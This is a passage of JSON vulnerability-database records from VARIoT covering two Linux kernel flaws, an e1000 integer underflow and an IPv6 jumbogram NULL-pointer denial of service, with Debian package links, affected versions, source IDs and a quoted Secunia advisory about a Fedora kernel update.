        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-24etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-24etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-24etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-24etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-24etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-24etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-24etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-24etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-24etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-24etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-24etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.24etch3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-24etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-24etch3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-24etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0029"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1184"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1265"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0029"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1360"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38831"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-1385"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001876"
      },
      {
        "db": "PACKETSTORM",
        "id": "82837"
      },
      {
        "db": "PACKETSTORM",
        "id": "79774"
      },
      {
        "db": "PACKETSTORM",
        "id": "78871"
      },
      {
        "db": "PACKETSTORM",
        "id": "80419"
      },
      {
        "db": "PACKETSTORM",
        "id": "78985"
      },
      {
        "db": "PACKETSTORM",
        "id": "78500"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-053"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1385"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-38831"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-1385"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001876"
      },
      {
        "db": "PACKETSTORM",
        "id": "82837"
      },
      {
        "db": "PACKETSTORM",
        "id": "79774"
      },
      {
        "db": "PACKETSTORM",
        "id": "78871"
      },
      {
        "db": "PACKETSTORM",
        "id": "80419"
      },
      {
        "db": "PACKETSTORM",
        "id": "78985"
      },
      {
        "db": "PACKETSTORM",
        "id": "78500"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-053"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1385"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2009-06-04T00:00:00",
        "db": "VULHUB",
        "id": "VHN-38831"
      },
      {
        "date": "2009-06-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2009-1385"
      },
      {
        "date": "2009-08-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2009-001876"
      },
      {
        "date": "2009-11-20T22:21:26",
        "db": "PACKETSTORM",
        "id": "82837"
      },
      {
        "date": "2009-07-29T18:53:58",
        "db": "PACKETSTORM",
        "id": "79774"
      },
      {
        "date": "2009-07-02T15:40:16",
        "db": "PACKETSTORM",
        "id": "78871"
      },
      {
        "date": "2009-08-17T18:33:30",
        "db": "PACKETSTORM",
        "id": "80419"
      },
      {
        "date": "2009-07-07T23:53:14",
        "db": "PACKETSTORM",
        "id": "78985"
      },
      {
        "date": "2009-06-17T22:54:42",
        "db": "PACKETSTORM",
        "id": "78500"
      },
      {
        "date": "2009-06-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200906-053"
      },
      {
        "date": "2009-06-04T16:30:00.297000",
        "db": "NVD",
        "id": "CVE-2009-1385"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-38831"
      },
      {
        "date": "2018-10-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2009-1385"
      },
      {
        "date": "2010-02-15T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2009-001876"
      },
      {
        "date": "2023-04-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200906-053"
      },
      {
        "date": "2023-02-13T02:20:10.757000",
        "db": "NVD",
        "id": "CVE-2009-1385"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-053"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel of  e1000_clean_rx_irq Integer underflow vulnerability in functions",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001876"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "digital error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-053"
      }
    ],
    "trust": 0.6
  }
}

var-201001-0163
Vulnerability from variot

The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in the Linux kernel before 2.6.32.4, when network namespaces are enabled, allows remote attackers to cause a denial of service (NULL pointer dereference) via an invalid IPv6 jumbogram, a related issue to CVE-2007-4567. Linux The kernel IPv6 jumbogram There is a vulnerability in the processing of. Attackers can exploit this issue to cause a kernel panic, denying service to legitimate users. ----------------------------------------------------------------------

Secunia integrated with Microsoft WSUS http://secunia.com/blog/71/


TITLE: Fedora update for kernel

SECUNIA ADVISORY ID: SA38168

VERIFY ADVISORY: http://secunia.com/advisories/38168/

DESCRIPTION: Fedora has issued an update for the kernel. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).

Successful exploitation requires that network namespaces are enabled.

SOLUTION: Apply updated packages via the yum utility ("yum update kernel").

ORIGINAL ADVISORY: FEDORA-2010-0823: https://admin.fedoraproject.org/updates/F12/FEDORA-2010-0823


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201001-0163",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "river systems linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "wind",
        "version": "3.1"
      },
      {
        "model": "river systems linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "wind",
        "version": "3.0"
      },
      {
        "model": "river systems linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "wind",
        "version": "0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux lts lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel -git14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel -git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -git7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel 2.6.33-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel 2.6.31-rc9",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc5-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-git11",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel 2.6.29-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.29-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.29-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel 2.6.27-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "desktop video device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "BID",
        "id": "37810"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "2.6.32.4",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Olli Jarva\nTuomo Untinen",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2010-0006",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
